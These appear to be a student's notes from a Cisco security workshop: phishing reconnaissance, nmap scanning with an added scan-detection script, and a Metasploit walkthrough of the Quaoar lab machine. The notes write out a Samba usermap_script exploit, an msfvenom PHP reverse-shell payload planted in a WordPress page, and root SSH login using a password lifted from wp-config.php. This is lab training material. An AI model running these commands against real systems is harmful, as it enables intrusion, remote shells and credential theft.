CISCO workshop
==================== PHISHING CAMPAIGN ==================================================
Passive Reconnaissance
-----------------------------------------------------------------------------------------
Sucuri SiteCheck and Quttera are VirusTotal vendors (URL scanners)
crawling --> digging into a site
namecheap --> can buy all kinds of domains.. phishing sites as well.
check for patterns and directories
typosquatting --> URL hijacking (look-alike domain names)
phishing sites (examples shown in the workshop):
http://cawpmnttraffi.com/ --> limitedverz.info -->
PhishTank --> Cisco's phishing URL database
campaigns --> ~1000 compromised sites that can drop malware (phishing campaign)
https://sitecheck.sucuri.net/ --> check phishing sites; https://www.virustotal.com/
==============================================================================================================
--------------------------------------------------------------------------------------------------------------
==============================================================================================================
nmap --> uses a 2-way (half-open) handshake: sends SYN, reads the reply, never completes the connection
------------------------------------------------------------------------------------------------------
================================ ACTIVE RECONNAISSANCE ==============================================
------------------------------------------------------------------------------------------------------
find the IPs in the network
-----------------------------
netdiscover -r IP_range
nmap working:
--------------------
nmap logic: it knocks and asks "are you there? is port 22 open?", and the target responds.
nmap sends a SYN and waits, sends a FIN and waits; all it needs to learn is whether the port exists (is open) or not.
it is a combination of ARP, NetBIOS and ping. it is fingerprinting, finding out what the target is.
does an ARP scan first, then pings, ...
scripting engine (NSE) --> can invoke a script as well.
nmap has 3 port states as output --> open, closed, filtered
nmap 192.168.25.102
nmap -R 192.168.25.102
--> check for old versions to get vulnerabilities
nmap -sS -sV 192.168.25.102 // -sS = SYN scan (stealth), -sV = version scan
nmap -sS -sV -O -vv 192.168.25.102 // -vv = very verbose, -O = OS detection
nmap scans the most frequently used ports by default .. 1000 ports
enum4linux 192.168.56.102 // enumeration - get more details on the host (SMB users, shares)
dirb site_address // brute-force directories on a web server
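Added example, not part of the workshop notes: it reproduces the rule nmap applies to a SYN probe's reply to get the three states listed above (open / closed / filtered), and adds the defender's side of the same traffic, flagging a source that probes many ports without completing handshakes. The flow records and source addresses are constructed; the target 192.168.25.102 is the one used in the notes.

```python
# Added example (not from the workshop notes): mimics how nmap turns a SYN
# probe's reply into the three states the notes list, and shows the defender's
# side: spotting a host that probes many ports without finishing the handshake.
from collections import defaultdict

# Constructed, simplified flow records, not a real sensor format:
# (source, target, target_port, reply_to_SYN) where reply_to_SYN is
# "SYN-ACK" (service answered), "RST" (port closed) or "NONE" (dropped by a firewall).
SAMPLE_FLOWS = [
    ("192.168.25.5", "192.168.25.102", 22, "SYN-ACK"),
    ("192.168.25.5", "192.168.25.102", 80, "SYN-ACK"),
    ("192.168.25.5", "192.168.25.102", 139, "SYN-ACK"),
    ("192.168.25.5", "192.168.25.102", 23, "RST"),
    ("192.168.25.5", "192.168.25.102", 25, "RST"),
    ("192.168.25.5", "192.168.25.102", 8080, "NONE"),
    ("192.168.25.5", "192.168.25.102", 3306, "RST"),
    ("192.168.25.5", "192.168.25.102", 443, "RST"),
    ("192.168.25.7", "192.168.25.102", 80, "SYN-ACK"),   # a normal web client
]

def classify_reply(reply):
    """Same rule nmap applies to a SYN probe: SYN-ACK -> open, RST -> closed,
    anything else (no reply / ICMP unreachable) -> filtered."""
    return {"SYN-ACK": "open", "RST": "closed"}.get(reply, "filtered")

def port_states(flows, target):
    """Map each probed port on `target` to open/closed/filtered."""
    return {port: classify_reply(reply)
            for src, dst, port, reply in flows if dst == target}

def find_scanners(flows, min_ports=5):
    """Defender view: a source touching >= min_ports distinct ports on one
    target looks like a port sweep, since normal clients hit one or two."""
    seen = defaultdict(set)
    for src, dst, port, _ in flows:
        seen[(src, dst)].add(port)
    return sorted(src for (src, dst), ports in seen.items() if len(ports) >= min_ports)

if __name__ == "__main__":
    for port, state in sorted(port_states(SAMPLE_FLOWS, "192.168.25.102").items()):
        print(f"{port}/tcp {state}")
    print("suspected scanners:", find_scanners(SAMPLE_FLOWS))
```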
-----------------------------------------------------------------------------------------------------------
======================================= METASPLOIT ========================================================
-----------------------------------------------------------------------------------------------------------
shell = the way to enter the kernel (command access on the target)
metasploit is built on Ruby
metasploit payloads work as DLLs
meterpreter shell is stealthy (runs in memory).
single and staged payloads (staged: establishes a connection first, then pushes the code to work on it)
reverse shell = once you get a shell, give it back to me: the target connects back to the attacker
-----------------------------------------------------------------------------------------
EXPLOITING SAMBA VULNERABILITY
-----------------------------------------------------------------------------------------
msfconsole
use exploit/multi/samba/usermap_script
show options
set RHOST 192.168.149.102
set LHOST 192.168.149.101
set LPORT 4444
show options
run
svchost.exe --> a host process for a collection of DLLs
google bombing
Emotet trojans
--------------------------------------------------------------------------------------------------------------
=================================== HACKING QUAOAR ========================================================
---------------------------------------------------------------------------------------------------------------
netdiscover -r ip
ping target
nmap -sS -sV -O -vv ip
--> if port 80 is open
dirb http://ip
check for robots.txt --> ip/robots.txt
check for the application version
enum4linux ip
check for usernames and accounts
----------------------------------------------------
nikto --> fingerprinting tool for checking web applications
nikto -h target_IP
Beautiful Soup --> Python crawler/HTML parser
------------------------------------------------------------
Quaoar has WordPress built in, so we need to check for WP vulnerabilities
wpscan --url http://192.168.56.101/wordpress
// check for users
wpscan --url http://192.168.56.101/wordpress --enumerate u
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.56.101 lport=4444 -f raw > shell.php
// paste the code into the wp page
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
show options
set lhost 192.168.56.102 // must match the lhost baked into the msfvenom payload
set lport 4444
// open the wp page that you
exploit // run the handler and wait for the connection back
// go into the wp-config.php file
// download and open it, or use
cat wp-config.php
ssh root@192.168.56.101
rootpassword! // password recovered from wp-config.php, reused for root